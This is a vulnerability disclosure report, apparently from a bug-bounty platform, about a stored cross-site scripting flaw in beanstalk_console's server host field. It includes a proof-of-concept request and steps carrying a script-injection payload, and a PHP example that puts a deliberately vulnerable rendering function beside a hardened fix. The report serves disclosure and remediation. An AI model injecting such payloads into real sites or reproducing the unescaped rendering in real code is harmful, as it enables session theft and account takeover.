Cross-site Scripting (XSS) - Stored in ptrofimov/beanstalk_console

Status: Valid

Reported on: Feb 8th 2022

Description

Stored XSS in the 'host' parameter when adding a server. The value entered in the host field is saved in the beansServers cookie and written back into the page without escaping.

Proof of Concept

// PoC.req
GET / HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:8088/
Cookie: PHPSESSID=annqppb7s8u647f8tquflpmfp4; beansServers=localhost%22%3E%3CsCrIpt%3Ealert(%22XsS%22)%3C%2FscRiPt%3E%3A11300
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Steps to Reproduce

Go to the Beanstalk console and choose Add server.

In the host field, enter the payload: localhost"><sCrIpt>alert("XsS")</scRIpt>
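The rendering pattern behind this report, shown as an added example that is not beanstalk_console's own code: a host value taken from the beansServers cookie and interpolated into markup unescaped, next to a hardened version that validates each entry and escapes on output. The function names and the "host:port" layout of the cookie are assumptions for illustration.

```php
<?php
// Added example, not code from beanstalk_console. Assumes the cookie holds
// "host:port" entries; function names are illustrative.
declare(strict_types=1);

/** Vulnerable pattern: the cookie-derived host lands in the markup untouched. */
function renderServerLinkUnsafe(string $entry): string
{
    $parts = explode(':', $entry, 2);
    $host = $parts[0];
    $port = $parts[1] ?? '';
    return '<a href="?server=' . $host . ':' . $port . '">' . $host . '</a>';
}

/**
 * Parse one "host:port" entry. Returns null unless the host is a plain
 * hostname or IPv4 literal and the port is 1-65535, so quotes and angle
 * brackets never make it into the stored server list at all.
 */
function parseServerEntry(string $entry): ?array
{
    $pos = strrpos($entry, ':');
    if ($pos === false) {
        return null;
    }
    $host = substr($entry, 0, $pos);
    $port = substr($entry, $pos + 1);

    // Hostname labels: letters, digits, dots and hyphens only, 253 chars max.
    if ($host === '' || strlen($host) > 253
        || !preg_match('/^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$/', $host)) {
        return null;
    }
    if (!ctype_digit($port) || (int) $port < 1 || (int) $port > 65535) {
        return null;
    }
    return ['host' => $host, 'port' => (int) $port];
}

/** Hardened pattern: reject malformed entries, then escape for the HTML and URL contexts. */
function renderServerLinkSafe(string $entry): string
{
    $server = parseServerEntry($entry);
    if ($server === null) {
        return '';
    }
    $hostPort = $server['host'] . ':' . $server['port'];
    $href = '?server=' . rawurlencode($hostPort);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
        . htmlspecialchars($hostPort, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</a>';
}

// Constructed input: the beansServers value from the report as PHP's $_COOKIE
// would present it (already URL-decoded).
$entry = 'localhost"><sCrIpt>alert("XsS")</scRiPt>:11300';

echo renderServerLinkUnsafe($entry), PHP_EOL;     // script tag reaches the page intact
echo renderServerLinkSafe($entry), PHP_EOL;       // empty: the entry is rejected
echo renderServerLinkSafe('localhost:11300'), PHP_EOL;
```

Validation on input and escaping on output are independent controls; keeping both means an entry that slips past the cookie parser still cannot break out of the attribute or text context it is written into.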

Impact

An attacker could use this vulnerability to steal a user's session cookie and gain unauthorized access to that user's account with the stolen cookie.

Timeline

lethanhphuc submitted the report
ptrofimov validated this vulnerability
lethanhphuc has been awarded the disclosure bounty
ptrofimov confirmed that a fix has been merged on 5aea5f
lethanhphuc has been awarded the fix bounty

Fix locations validated: serversList.php#L72, serversList.php#L47-L49, main.php#L68, main.php#L80